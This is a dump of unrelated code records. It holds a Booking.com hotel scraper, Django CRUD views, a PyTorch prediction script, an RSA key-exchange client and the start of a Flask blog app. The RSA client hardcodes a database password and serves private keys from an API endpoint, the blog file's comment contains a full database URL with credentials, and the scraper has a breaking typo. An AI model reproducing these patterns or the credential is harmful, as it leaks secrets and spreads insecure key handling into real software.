Spider_Website_Base\r\n\r\n\r\n\r\nclass Spider_Website_Booking(Spider_Website_Base):\r\n ''' 用于爬Booking网站的数据的东东 ''' \r\n \r\n def __init__(self,mysql_process,filesave_dir):\r\n Spider_Website_Base.__init__(self,80001,\"http://www.booking.com\",mysql_process,filesave_dir)\r\n \r\n \r\n def crawlweb_countryurl(self,website_desc,saveto_db=False):\r\n \r\n ret = 0\r\n # 读取国家信息到数据库\r\n #'http://www.booking.com/destination.zh-cn.html'\r\n rsp_content = self.openner_crawlweb(website_desc._country_url)\r\n if (rsp_content == None):\r\n return -1\r\n \r\n self.save_to_file(save_data=saversp_content,\r\n country_id=0,\\\r\n city_id=0,\\\r\n hotel_id=0,\\\r\n page_id=0)\r\n \r\n # 对于HTML文件进行翻译\r\n soup = BeautifulSoup(rsp_content)\r\n # 这个段落没有用class进行区分,\r\n raw_country_list = soup.find_all(name=\"div\", class_=\"flatList\")\r\n # 再分析一次,去掉div等信息,吼吼\r\n soup = BeautifulSoup(str(raw_country_list))\r\n country_list = soup.find_all(name=\"a\")\r\n for country_item in country_list :\r\n country_def = ZQ_Country_Define()\r\n country_url = ZQ_Website_Country_Url()\r\n # print country_item\r\n tag = BeautifulSoup(str(country_item))\r\n # 这个判定有点太简单了。\r\n country_def._country_cn_name = tag.string.strip()\r\n country_url._website_id = self._website_id\r\n #内部链接要家域名\r\n country_url._country_city_url = self._website_domain + tag.a['href']\r\n \r\n ret,data_count = self._mysql_process.get_country_define(country_def)\r\n if (ret != 0):\r\n return ret \r\n \r\n #谁说Python的缩进好看,我和他急\r\n if (data_count == 0) :\r\n if (saveto_db == True):\r\n ret = self._mysql_process.set_country_define(country_def)\r\n if (ret != 0):\r\n self._logger.info(\"Save this country define %s to database fail.\" % country_def._country_cn_name)\r\n return ret \r\n else :\r\n self._logger.info(\"No found this country %s in define table. continue process next\" % country_def._country_cn_name)\r\n continue\r\n #得到配置的国际ID,然后保存抓取的数据\r\n country_url._country_id = country_def._country_id\r\n ret = self._mysql_process.set_website_country_url(country_url)\r\n if (ret != 0 ):\r\n self._logger.info(\"Save this country [%d|%s] to database fail.\" \\\r\n % (country_def._country_id,country_def._country_cn_name))\r\n return ret\r\n else :\r\n self._logger.info(\"Save this country desc [%d|%s] to database success.\" \\\r\n % (country_def._country_id,country_def._country_cn_name))\r\n \r\n return 0\r\n \r\n\r\n \r\n def crawlweb_cityurl(self, country_url,saveto_db=False):\r\n ''' '''\r\n # 读取国家信息到数据库\r\n rsp_content = self.openner_crawlweb(country_url._country_city_url)\r\n if (rsp_content == None):\r\n return -1\r\n \r\n self.save_to_file(save_data=rsp_content,\r\n country_id=country_url._country_id,\\\r\n city_id=0,\\\r\n hotel_id=0,\\\r\n page_id=0)\r\n \r\n # 对于HTML文件进行分析处理,\r\n soup = BeautifulSoup(rsp_content)\r\n raw_web_data = soup.find_all(name=\"div\", class_=\"description deslast\")\r\n \r\n soup = BeautifulSoup(str(raw_web_data))\r\n raw_web_data = soup.find_all(name=\"table\", class_=\"general\")\r\n \r\n soup = BeautifulSoup(str(raw_web_data))\r\n city_list = soup.find_all(name=\"a\")\r\n for city_item in city_list :\r\n city_def = ZQ_City_Define()\r\n city_url = ZQ_Website_City_Url()\r\n # print country_item\r\n tag = BeautifulSoup(str(city_item))\r\n # 这个判定有点太简单了。\r\n city_def.city_cn_name_ = tag.string.strip()\r\n city_def._country_id = country_url._country_id\r\n city_url._website_id = self._website_id\r\n city_url._country_id = country_url._country_id\r\n #内部链接要家域名\r\n city_url._city_info_url = self._website_domain + tag.a['href']\r\n \r\n ret,data_count = self._mysql_process.get_city_define(city_def)\r\n if (ret != 0):\r\n return ret \r\n \r\n #谁说Python的缩进好看,我和他急\r\n if (data_count == 0) :\r\n if (saveto_db == True):\r\n ret = self._mysql_process.set_city_define(city_def)\r\n if (ret != 0):\r\n self._logger.info(\"Save this city define [%s] to database fail.\" % city_def.city_cn_name_)\r\n return ret \r\n else :\r\n self._logger.info(\"No found this city define [%s] in define table. continue process next\" % city_def.city_cn_name_)\r\n continue\r\n \r\n #根据city_info的地方得到HOTEL的URL,BOOKING网站比较变态,要跳转2次\r\n #第一次跳转\r\n rsp_content = self.openner_crawlweb(city_url._city_info_url)\r\n if (rsp_content == None):\r\n self._logger.error(\"Get city [%s] info url [%s] fail.\",city_def.city_cn_name_,city_url._city_info_url)\r\n continue\r\n \r\n soup = BeautifulSoup(rsp_content)\r\n raw_web_data = soup.find_all(name=\"p\", class_=\"firstpar\")\r\n \r\n soup = BeautifulSoup(str(raw_web_data))\r\n raw_web_data = soup.find_all(name=\"a\")\r\n tag = BeautifulSoup(str(raw_web_data))\r\n \r\n city_url.city_hotel_url_ = self._website_domain + tag.a['href']\r\n \r\n #第二次跳转,得到真正所有的的CITY酒店连接\r\n rsp_content = self.openner_crawlweb(city_url.city_hotel_url_)\r\n if (rsp_content == None):\r\n self._logger.error(\"Get city [%s] hotel url [%s] fail.\",city_def.city_cn_name_,city_url._city_info_url)\r\n continue\r\n \r\n soup = BeautifulSoup(rsp_content)\r\n raw_web_data = soup.find_all(name=\"p\", class_=\"allhotelsin\")\r\n soup = BeautifulSoup(str(raw_web_data))\r\n raw_web_data = soup.find_all(name=\"a\" , class_=\"all_hotels_in_dest\")\r\n tag = BeautifulSoup(str(raw_web_data))\r\n \r\n if (tag.a != None) :\r\n city_url.all_hotel_url_ = self._website_domain + tag.a['href']\r\n city_url._spider_priority = 100\r\n \r\n #得到配置的国际ID,然后保存抓取的数据\r\n city_url._city_id = city_def._city_id\r\n ret = self._mysql_process.set_website_city_url(city_url)\r\n if (ret != 0 ):\r\n self._logger.info(\"Save this city desc [%s] to database fail.\" % city_def.city_cn_name_)\r\n return ret\r\n else :\r\n self._logger.info(\"Save this city desc [%s] to database success.\" % city_def.city_cn_name_)\r\n return 0 \r\n \r\n\r\n \r\n def __save_hotel_url(self,city_url,hotel_item,saveto_db=False):\r\n ''' ''' \r\n hotel_def = ZQ_Hotel_Define()\r\n hotel_url = ZQ_Website_Hotel_Url()\r\n tag = BeautifulSoup(str(hotel_item))\r\n \r\n hotel_name = tag.string.strip()\r\n hotel_def._hotel_en_name = hotel_name\r\n \r\n #如果里面有中文字符串,提取出来 ,示例CHINA(中国)\r\n bracket_start = hotel_name.find(\"(\")\r\n if bracket_start != -1 and bracket_start > 0:\r\n bracket_end = hotel_name.find(\")\")\r\n if (bracket_end - bracket_start) > 1:\r\n hotel_def._hotel_en_name = (hotel_name[0:bracket_start]).strip()\r\n hotel_def._hotel_cn_name = (hotel_name[bracket_start+1:bracket_end]).strip()\r\n \r\n #print \"[%s|%s]\"%(hotel_def._hotel_en_name,hotel_def._hotel_cn_name)\r\n hotel_def._website_id = self._website_id\r\n hotel_def._country_id = city_url._country_id\r\n hotel_def._city_id = city_url._city_id\r\n\r\n #内部链接要家域名\r\n hotel_url._website_id = self._website_id\r\n hotel_url._country_id = city_url._country_id\r\n hotel_url._city_id = city_url._city_id\r\n hotel_url._hotel_desc_url = self._website_domain + tag.a['href']\r\n ret,data_count = self._mysql_process.get_hotel_define(hotel_def)\r\n if (ret != 0):\r\n return ret \r\n \r\n #谁说Python的缩进好看,我和他急\r\n if (data_count == 0) :\r\n if (saveto_db == True):\r\n ret = self._mysql_process.set_hotel_define(hotel_def)\r\n if (ret != 0):\r\n self._logger.info(\"Save this hotel define [%s] to database fail.\" % hotel_def._hotel_en_name)\r\n return ret \r\n else :\r\n self._logger.info(\"No found this hotel [%s] in define table. continue process next\" % hotel_def._hotel_en_name)\r\n return 0\r\n #得到配置的ID,然后保存抓取的数据\r\n hotel_url._hotel_id = hotel_def._hotel_id\r\n ret = self._mysql_process.set_website_hotel_url(hotel_url)\r\n if (ret != 0 ):\r\n self._logger.info(\"Save this hotel url[%s] to database fail.\" % hotel_def._hotel_en_name)\r\n return ret\r\n else :\r\n self._logger.info(\"Save this hotel url [%s] to database success.\" % hotel_def._hotel_en_name)\r\n \r\n return 0 \r\n \r\n def crawlweb_hotelurl(self,city_url,saveto_db=False):\r\n ''' 爬取酒店的URL, '''\r\n ret = 0\r\n city_hotel_count = 0\r\n #对于有多个Hotel的页面进行爬取\r\n if (city_url.all_hotel_url_ != \"\"):\r\n \r\n #有NEXT页面,所以一次抓取一张\r\n crawlweb = city_url.all_hotel_url_\r\n page_count = 0\r\n while (True):\r\n \r\n rsp_content = self.openner_crawlweb(crawlweb)\r\n if (rsp_content == None):\r\n return -1\r\n \r\n self.save_to_file(save_data=rsp_content,\r\n country_id=city_url._country_id,\\\r\n city_id=city_url._city_id,\\\r\n hotel_id=0,\\\r\n page_id=page_count)\r\n \r\n soup = BeautifulSoup(rsp_content)\r\n \r\n hotel_list = soup.find_all(name=\"a\",class_=\"hotel_name_link url \")\r\n next_web_data = soup.find_all(name=\"td\",class_=\"next\")\r\n \r\n for hotel_item in hotel_list :\r\n city_hotel_count += 1\r\n ret = self.__save_hotel_url(city_url,hotel_item,saveto_db)\r\n #如果没有下一页,跳出循环,如果有下一页,重新进行爬取得 \r\n soup = BeautifulSoup(str(next_web_data))\r\n next_web_data = soup.find_all(name=\"a\")\r\n \r\n tag = BeautifulSoup(str(next_web_data))\r\n if (tag.a == None) :\r\n break\r\n crawlweb = self._website_domain + tag.a['href']\r\n page_count += 1\r\n #对于只有少量Hotel信息的页面进行抓取\r\n elif (city_url.city_hotel_url_ != \"\") :\r\n rsp_content = self.openner_crawlweb(city_url.city_hotel_url_)\r\n if (rsp_content == None):\r\n return -1\r\n \r\n self.save_to_file(save_data=rsp_content,\r\n country_id=city_url._country_id,\\\r\n city_id=city_url._city_id,\\\r\n hotel_id=0,\\\r\n page_id=0)\r\n \r\n soup = BeautifulSoup(rsp_content)\r\n table_list = soup.find_all(name=\"table\",class_=\"promos\")\r\n city_hotel_data = table_list[0]\r\n soup = BeautifulSoup(str(city_hotel_data))\r\n hotel_list = soup.find_all(name=\"a\",class_=\"hotelname\")\r\n for hotel_item in hotel_list :\r\n city_hotel_count += 1\r\n ret = self.__save_hotel_url(city_url,hotel_item,saveto_db)\r\n \r\n else :\r\n self._logger.error(\"This city [%d|%d] has no url .\" % (city_url._country_id,city_url._city_id))\r\n \r\n self._logger.info(\"This city [%d|%d] has [%d] url .\" % (city_url._country_id,city_url._city_id,city_hotel_count))\r\n return 0\r\n \r\n #---------------------------------------------------------------------------------------------\r\n\r\n \r\n\r\n \r\n def crawlweb_hoteldesc(self,hotel_url,saveto_db=False):\r\n '''取得酒店的各种信息,描述,图片,房间等 '''\r\n \r\n #TNNNNNND的万里长征终于搞完了第一步 《大龄文艺女青年》 你看 你看 你看她只会做西红柿炒鸡蛋  你看 你看 还要就着方便面\r\n \r\n self._logger.info(\"This hotel [%d] url [%s].\" %\\\r\n (hotel_url._hotel_id,hotel_url._hotel_desc_url))\r\n \r\n \r\n rsp_content = self.openner_crawlweb(hotel_url._hotel_desc_url)\r\n if (rsp_content == None):\r\n return -1\r\n \r\n self.save_to_file(save_data=rsp_content,\r\n country_id=hotel_url._country_id,\\\r\n city_id=hotel_url._city_id,\\\r\n hotel_id=hotel_url._hotel_id,\\\r\n page_id=0)\r\n soup = BeautifulSoup(rsp_content)\r\n \r\n hotel_desc = ZQ_Website_Hotel_Desc()\r\n hotel_desc._website_id = hotel_url._website_id\r\n hotel_desc._hotel_id = hotel_url._hotel_id\r\n hotel_desc.desc_lanuage_ = 1\r\n \r\n #find_all(limit=1) 和find功能一致\r\n item_average = soup.find(name=\"span\",attrs={\"class\":\"average\"})\r\n item_star = soup.find(name=\"span\",attrs={\"class\":re.compile(\"use_sprites\")})\r\n item_desc = soup.find(name=\"div\",id=\"summary\")\r\n item_number = soup.find(name=\"p\",attrs={\"class\":re.compile(\"summary\")})\r\n item_facility = soup.find_all(name=\"p\",class_=\"firstpar\")\r\n item_net = soup.find(name=\"div\",attrs={\"id\":\"internet_policy\"})\r\n item_park = soup.find(name=\"div\",attrs={\"id\":\"parking_policy\"})\r\n item_policies = soup.find(name=\"div\", attrs={\"id\":\"hotelPoliciesInc\",\"class\":\"descriptionsContainer\"})\r\n item_potho = soup.find(name=\"div\",attrs={\"class\":\"photo_collage base_collage\"})\r\n \r\n \r\n #取得得分,#这儿会取得好几个分数,因为页面下面还有其他推荐,我值取第一个,目前看是就是这个酒店。\r\n if (item_average != None):\r\n tag = BeautifulSoup(str(item_average))\r\n hotel_desc.average_ = tag.string.strip()\r\n else:\r\n self._logger.error(\"This hotel page [%d|%d] don't get average .\" % \\\r\n (hotel_url._website_id,hotel_url._hotel_id))\r\n \r\n #取得星级,这儿会取得好几个分数,因为页面下面还有其他推荐,我值取第一个,目前看是就是这个酒店。\r\n if (item_star != None):\r\n tag = BeautifulSoup(str(item_star))\r\n hotel_desc.hotel_star_ = tag.span['title']\r\n else:\r\n self._logger.error(\"This hotel page [%d|%d] don't get star .\" % \\\r\n (hotel_url._website_id,hotel_url._hotel_id)) \r\n \r\n #读的描述\r\n if (item_desc != None):\r\n soup = BeautifulSoup(str(item_desc))\r\n desc_list = soup.find_all(name=\"p\")\r\n for desc_item in desc_list :\r\n tag = BeautifulSoup(str(desc_item))\r\n if (tag.string != None) :\r\n hotel_desc.hotel_desc_ += tag.string.strip()\r\n hotel_desc.hotel_desc_ += \"\\n\"\r\n else:\r\n self._logger.error(\"This hotel page [%d|%d] don't get desc .\" % \\\r\n (hotel_url._website_id,hotel_url._hotel_id))\r\n \r\n #读的房间数量 \r\n if (item_number != None):\r\n soup = BeautifulSoup(str(item_number))\r\n hotel_desc.room_number_ = soup.text\r\n else:\r\n self._logger.error(\"This hotel page [%d|%d] don't get room number .\" % \\\r\n (hotel_url._website_id,hotel_url._hotel_id))\r\n #对设施字段进行处理\r\n if (item_facility != []):\r\n len_facility = len(item_facility)\r\n \r\n if (len_facility >= 2):\r\n tag = BeautifulSoup(str(item_facility[0]))\r\n hotel_desc.room_services_ = tag.string\r\n tag = BeautifulSoup(str(item_facility[1]))\r\n hotel_desc.hotel_services_ = tag.string\r\n if (len_facility >= 3):\r\n tag = BeautifulSoup(str(item_facility[0]))\r\n hotel_desc.room_services_ = tag.string\r\n tag = BeautifulSoup(str(item_facility[1]))\r\n hotel_desc.entertainment_ = tag.string\r\n tag = BeautifulSoup(str(item_facility[2]))\r\n hotel_desc.hotel_services_ = tag.string\r\n else:\r\n self._logger.error(\"This hotel page [%d|%d] don't get facility .\" % \\\r\n (hotel_url._website_id,hotel_url._hotel_id))\r\n #对设施字段进行处理\r\n\r\n #处理网络信息 \r\n if (item_net != None):\r\n soup = BeautifulSoup(str(item_net))\r\n item_net = soup.find(name=\"p\")\r\n soup = BeautifulSoup(str(item_net))\r\n hotel_desc.net_facility_ = soup.p.get_text().strip().replace(\"\\n\",\"\") \r\n else:\r\n self._logger.error(\"This hotel page [%d|%d] don't get internet .\" % \\\r\n (hotel_url._website_id,hotel_url._hotel_id))\r\n \r\n #处理停车位的信息 \r\n if (item_park != None):\r\n \r\n soup = BeautifulSoup(str(item_park))\r\n item_net = soup.find(name=\"p\")\r\n soup = BeautifulSoup(str(item_park))\r\n hotel_desc.hotel_park_ = soup.p.get_text().strip().replace(\"\\n\",\"\") \r\n else:\r\n self._logger.error(\"This hotel page [%d|%d] don't get park .\" % \\\r\n (hotel_url._website_id,hotel_url._hotel_id))\r\n \r\n #爬取酒店政策字段\r\n if (item_policies != None):\r\n \r\n #去掉注释\r\n soup = BeautifulSoup(re.sub(\"\",\"\",str(item_policies)))\r\n item_list = soup.find_all(name=\"div\",attrs={\"class\":\"description\"})\r\n policies_count = 0\r\n for item in item_list :\r\n policies_count += 1\r\n soup = BeautifulSoup(str(item))\r\n key_string = soup.find(name=\"span\")\r\n value_string = soup.find(name=\"p\")\r\n if (key_string == None or value_string == None):\r\n break\r\n if (policies_count < 6):\r\n hotel_desc.hotel_policy_ += key_string.get_text() + \":\"\r\n hotel_desc.hotel_policy_ += value_string.get_text().strip().replace(\"\\n\",\"\") \r\n hotel_desc.hotel_policy_ += \"\\n\"\r\n else:\r\n hotel_desc.credit_card_ = key_string.get_text() + \":\" + value_string.get_text().strip().replace(\"\\n\",\"\") \r\n \r\n else:\r\n self._logger.error(\"This hotel page [%d|%d] don't get internet .\" % \\\r\n (hotel_url._website_id,hotel_url._hotel_id))\r\n \r\n ret = self._mysql_process.set_website_hotel_desc(hotel_desc)\r\n if (ret != 0 ):\r\n self._logger.error(\"Save this hotel desc [%d|%d] to database fail.\" % \\\r\n (hotel_url._website_id,hotel_url._hotel_id))\r\n return ret\r\n else :\r\n self._logger.info(\"Save this hotel desc [%d|%d] to database Success.\" % \\\r\n (hotel_url._website_id,hotel_url._hotel_id))\r\n \r\n #处理图片信息\r\n pic_list = []\r\n if (item_potho != None):\r\n soup = BeautifulSoup(str(item_potho))\r\n pic_script = soup.find(name=\"script\")\r\n \r\n line_list = str(pic_script).splitlines()\r\n \r\n for str_line in line_list :\r\n pic_url_group = re.search(r\"http://.*?\\.jpg\",str_line)\r\n if pic_url_group != None:\r\n pic_list.append(pic_url_group.group())\r\n \r\n else:\r\n self._logger.error(\"This hotel page [%d|%d] don't get photo link .\" % \\\r\n (hotel_url._website_id,hotel_url._hotel_id))\r\n \r\n #将所有的图片信息存放到DB中,以备以后抓取\r\n md5_fun = md5.new()\r\n for pic_url in pic_list :\r\n zq_photo_url = ZQ_Website_Hotel_Picture()\r\n zq_photo_url._website_id = hotel_url._website_id\r\n zq_photo_url._hotel_id = hotel_url._hotel_id\r\n zq_photo_url._picture_url = pic_url\r\n \r\n md5_fun.update(pic_url)\r\n zq_photo_url._picture_url_md5 = md5_fun.hexdigest() \r\n ret = self._mysql_process.set_website_hotel_picture(zq_photo_url)\r\n if ( ret != 0 ):\r\n self._logger.error(\"This hotel page [%d|%d] picture url[%s] save fail .\" % \\\r\n (hotel_url._website_id,hotel_url._hotel_id,zq_photo_url._picture_url))\r\n self._logger.info(\"This hotel page [%d|%d] has number [%d] picture.\"%\\\r\n (hotel_url._website_id,hotel_url._hotel_id,len(pic_list))) \r\n return 0 \r\n\r\nif __name__ == \"__main__\":\r\n # print (content)\r\n test_spider = Spider_Website_Booking()\r\n test_spider.crawlweb_countryurl()\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"BGCX261/zouqi-svn-to-git","sub_path":"trunk/src/spider/spider_website_booking.py","file_name":"spider_website_booking.py","file_ext":"py","file_size_in_byte":22684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"29844308901","text":"from django.shortcuts import render, redirect, get_object_or_404,HttpResponse\nfrom django.urls import reverse\nfrom .models import MyData\nfrom .form import CreateDataForm, UpdateDataForm\n\n# Create your views here.\n\n\ndef list_data(request):\n data = MyData.objects.all()\n context = {\n 'data': data,\n }\n return render(request, 'index.html', context)\n\n\ndef create_data(request):\n if request.method == 'POST':\n form = CreateDataForm(request.POST, request.FILES)\n if form.is_valid():\n form.save()\n return redirect('/')\n else:\n form = CreateDataForm()\n \n context = {\n 'creation_form': form,\n }\n return render(request, 'add_data.html', context)\n\n\ndef update_data(request,pk):\n # data = MyData.objects.get(pk=pk)\n data = get_object_or_404(MyData,pk=pk)\n if request.method == 'POST':\n form = UpdateDataForm(request.POST,request.FILES,instance=data)\n if form.is_valid():\n form.save()\n # return redirect('/')\n return redirect(reverse('home:list_data'))\n else:\n form = UpdateDataForm(instance=data)\n \n context = {\n 'update_form': form,\n }\n return render(request, 'edit_data.html', context)\n\n\ndef destroy_data(request,pk):\n data = get_object_or_404(MyData,pk=pk)\n data.delete()\n return redirect('/')\n","repo_name":"Abdallah-Ibra/django_course_1_vision","sub_path":"CRUD System/home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"36542895789","text":"class Tweet:\n #prueba\n\n def __init__(self,fecha, usuario, recuperados,nuevosCasos,fallecidos,muestras,pcr,antigeno,totalRecuperados,totalCasos,totalFallecidos,totalMuestrasPorcesadas,totalActivos):\n self.fecha = fecha \n self.usuario = usuario \n self.recuperados = recuperados \n self.nuevosCasos = nuevosCasos \n self.fallecidos = fallecidos \n self.muestras = muestras \n self.pcr = pcr \n self.antigeno = antigeno \n self.totalRecuperados = totalRecuperados \n self.totalCasos = totalCasos \n self.totalFallecidos = totalFallecidos \n self.totalMuestrasPorcesadas = totalMuestrasPorcesadas \n self.totalActivos = totalActivos\n\n def toDBColecction(self):\n return{\n 'fecha':self.fecha ,\n 'usuario':self.usuario ,\n 'recuperados':self.recuperados ,\n 'nuevosCasos':self.nuevosCasos , \n 'fallecidos':self.fallecidos , \n 'muestras':self.muestras ,\n 'pcr':self.pcr ,\n 'antigeno':self.antigeno ,\n 'totalRecuperados':self.totalRecuperados , \n 'totalCasos':self.totalCasos ,\n 'totalFallecidos':self.totalFallecidos ,\n 'totalMuestrasPorcesadas':self.totalMuestrasPorcesadas ,\n 'totalActivos':self.totalActivos\n } \n ","repo_name":"sergiopintah/Python-api-Twitter","sub_path":"tweet.py","file_name":"tweet.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"5140567400","text":"\nimport numpy as np\nimport torch\n\nfrom train_by_transformer import my_transformer\nfrom PIL import Image\nfrom torch import nn\nfrom torchvision import transforms\ndevice='cuda'\nd_input = 256\nheads = 8\ndropout = 0.1\n\nmodel =my_transformer(lenth=32)\n\nimage_path='E:/1.SCSF\\Self_supervision\\data/val\\_0/30.jpg'\nimg=Image.open(image_path).convert('1')\nlabel=Image.open('E:/1.SCSF\\Self_supervision\\data/val\\_3/30_3.jpg').convert('1')\n\nmodel.load_state_dict(torch.load( \"save_weights/best_my_model_TF_self.pth\"))\n\nmodel.to(device)\n\nto_tensor = transforms.ToTensor() # 必须进行实例化\n\nimg = to_tensor(img)\nimg = img.view(128, 128)\nimg=img.unsqueeze(0).to(device)\n\nlabel=to_tensor(label).to(device)\nlabel=label.view(32,128)\nlabel=label.unsqueeze(0).to(device)\n\n#创建掩码矩阵,模拟预测过程\nmatrix = np.ones((32, 32))\nT_matrix = torch.from_numpy(matrix)\nmask1 = torch.triu(T_matrix, 0).to(device)\nmask1=torch.t(mask1)\n\npredict=model(img,label,tgt_mask=mask1)\n\n\n#将概率值转成像素值:\nfor i in range(32):\n for j in range(128):\n\n if predict[0][i][j]>0.1:\n predict[0][i][j]=1\n else:\n predict[0][i][j]=0\nprint(predict)\n\n#将标签图和预测图显示,观察结果差距\nunloader = transforms.ToPILImage()#tensor转PIL\nimage = unloader(predict)\ntensor_image=to_tensor(image).to(device)\nimage.show()\nima2=unloader(label)\nima2.show()\n\n#输出loss值\nloss1=nn.L1Loss()\nloss=loss1(predict,label)\nprint(loss)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"wuyulongstudy/my_self-supervised_transformer-","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":1482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"24164583645","text":"import mysql.connector\nfrom Crypto.Cipher import PKCS1_OAEP\nfrom Crypto.PublicKey import RSA\nfrom flask import Flask\nimport server\napp= Flask(__name__)\n\n\ndb = mysql.connector.connect(\n host=\"localhost\",\n user=\"root\",\n password=\"rootpass\",\n database=\"data\"\n )\n#generate Keys for client\nkeyPair = RSA.generate(3072)\npubKey = keyPair.publickey()\npubKeyPEM = pubKey.exportKey()\nprivKeyPEM = keyPair.exportKey()\n\n\nmycursor = db.cursor()\nmycursor.execute(\"INSERT INTO clientKeys (clientPubKeyPEM,clientPrivKeyPEM) VALUES (%s,%s)\",(pubKeyPEM, privKeyPEM))\ndb.commit()\n\nserver.generateServerKeys()#call function to generate keys for server\nmycursor.execute(\"SELECT serverPubKeyPEM FROM serverKeys\")\nfor i in mycursor:\n serverPubKey = i\n a = \"\".join(serverPubKey)\nimportedServerPubKey = RSA.importKey(a)#convert to ras Key\n\nmycursor.execute(\"SELECT clientPubKeyPEM FROM clientKeys\")\nfor i in mycursor:\n clientPubKey = i\n cPubKey = \"\".join(clientPubKey)\nimportedClientPubKey = RSA.importKey(cPubKey)#convert to ras Key\nmycursor.execute(\"SELECT clientPubKeyPEM FROM clientKeys\")\nfor i in mycursor:\n clientPvtKey = i\n clientPvtKey = \"\".join(clientPubKey)\nencode_message = str(importedClientPubKey)\nencryptor = PKCS1_OAEP.new(importedServerPubKey) #encryptor\nencrypted = encryptor.encrypt(encode_message.encode())\nencryptor1 = str(encryptor)\nprint(\"Encrypted:\", encrypted)\n\n\nmycursor = db.cursor()\nmycursor.execute(\"INSERT INTO encriptedKeys (encriptedKey,keyNum) VALUES (%s,%s)\", (encrypted, encryptor1))\ndb.commit()\n\nmycursor = db.cursor()\nmycursor.execute(\"SELECT serverPrivKeyPEM FROM serverKeys\")\nfor i in mycursor:\n serverPvtKey = i\n serverPvtKey = str(\"\".join(serverPvtKey))\nmycursor = db.cursor()\nmycursor.execute(\"SELECT encriptedKey FROM encriptedKeys\")\nfor i in mycursor:\n encryptedClientsPubKey = i\nimportedServerPvtKey = RSA.importKey(serverPvtKey) #convert to ras Key\n\ndecryptor1 = PKCS1_OAEP.new(importedServerPvtKey)\ndecrypted = decryptor1.decrypt((encryptedClientsPubKey[0]))\nserver.secondEncription(decrypted)\n\nfinalPubKeyPEM , finalPrivKeyPEM = server.generateSecondKey()##call function to generate second key set\n\n#api route\n@app.route(\"/endTOEndEncryption\")\ndef endTOEndEncryption():\n return {\"endTOEndEncryption\":[\"client public key:\",str(clientPubKey),\"client private key:\",str(clientPvtKey),\"server public key:\",str(serverPubKey),\"server private key:\",str(serverPvtKey),\"second public key for client :\",str(finalPubKeyPEM),\"second public key for client :\",str(finalPrivKeyPEM)]}\n\nif __name__ == \"__main__\":\n app.run(debug=True)","repo_name":"UdaraSandaruwan/RSAEncryptionDecription","sub_path":"ClientNew.py","file_name":"ClientNew.py","file_ext":"py","file_size_in_byte":2602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"13532549783","text":"from flask import Flask, render_template, redirect, url_for, flash, request, abort\nfrom flask_bootstrap import Bootstrap5\nfrom flask_ckeditor import CKEditor\nfrom datetime import date\nfrom werkzeug.security import generate_password_hash, check_password_hash\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_login import UserMixin, login_user, LoginManager, login_required, current_user, logout_user\nfrom forms import CreatePostForm, RegisterForm, LoginForm, CommentForm\nfrom flask_gravatar import Gravatar\nfrom functools import wraps\nfrom sqlalchemy import Table, Column, Integer, ForeignKey\nfrom sqlalchemy.orm import relationship, declarative_base\nfrom flask_migrate import Migrate\nimport os\nfrom dotenv import load_dotenv\n\nload_dotenv() # take environment variables from .env.\n\n# Base = declarative_base()\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = os.getenv(\"SECRET_KEY\")\nckeditor = CKEditor(app)\nBootstrap5(app)\n\n##CONNECT TO DB\napp.config['SQLALCHEMY_DATABASE_URI'] = os.getenv(\"DATABASE_URL\")\n# , default=\"sqlite:///blog.db\"\n# postgresql://blog_data_rxkz_user:cOwXti1ydNSaLI0TEnO0bMIccDYnHlKT@dpg-ci71bsp8g3n3vm4o95r0-a.oregon-postgres.render.com/blog_data_rxkz\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\ndb = SQLAlchemy()\ndb.init_app(app)\nsession = db.session\n\n# CONFIGURE APP FOR FLASK_LOGIN\nlogin_manager = LoginManager()\nlogin_manager.init_app(app)\n\n# MIGRATE OBJECT\nmigrate = Migrate(app, db)\n\n\n@login_manager.user_loader\ndef load_user(user_id):\n return session.get(entity=Users, ident=int(user_id))\n\n\n##CONFIGURE TABLES\n\n\n# ADMIN_DECORATOR\ndef admin_only(f):\n @wraps(f)\n def decorated_function(*args, **kwargs):\n # If user is not actually logged in\n if current_user.is_anonymous:\n print(\"User is anonymous\")\n return abort(403, description=\"User is anonymous\")\n # If id is not 1 then return abort with 403 error\n elif current_user.id != 1:\n print(\"User is not an admin\")\n return abort(403, description=\"User is not an admin\")\n else:\n print(\"User is an admin\")\n # Otherwise, continue with the route function\n return f(*args, **kwargs)\n\n return decorated_function\n\n\n# MODELS\nclass Users(UserMixin, db.Model):\n __tablename__ = 'users'\n id = db.Column(db.Integer, primary_key=True)\n email = db.Column(db.String(150), unique=True, nullable=False)\n password = db.Column(db.String(150), unique=False, nullable=False)\n name = db.Column(db.String(150), unique=False, nullable=False)\n posts = db.relationship('BlogPost', backref='user')\n comment = db.relationship('Comment', backref='user')\n\n\nclass BlogPost(db.Model):\n __tablename__ = \"blog_posts\"\n id = db.Column(db.Integer, primary_key=True)\n author = db.Column(db.String(250), nullable=False)\n title = db.Column(db.String(250), unique=True, nullable=False)\n subtitle = db.Column(db.String(250), nullable=False)\n date = db.Column(db.String(250), nullable=False)\n body = db.Column(db.Text(10485760), nullable=False)\n img_url = db.Column(db.Text(108600), nullable=False)\n user_id = db.Column(db.Integer, ForeignKey('users.id'))\n comment = db.relationship('Comment', backref='blog_posts')\n\n\n# db.create_all()\n\nclass Comment(db.Model):\n __tablename__ = \"comments\"\n id = db.Column(db.Integer, primary_key=True)\n text = db.Column(db.String(300))\n user_id = db.Column(db.Integer, ForeignKey('users.id'))\n blog_id = db.Column(db.Integer, ForeignKey('blog_posts.id'))\n\n\n# GRAVATAR SETUP\ngravatar = Gravatar(app,\n size=100,\n rating='g',\n default='retro',\n force_default=False,\n force_lower=False,\n use_ssl=False,\n base_url=None)\n\nwith 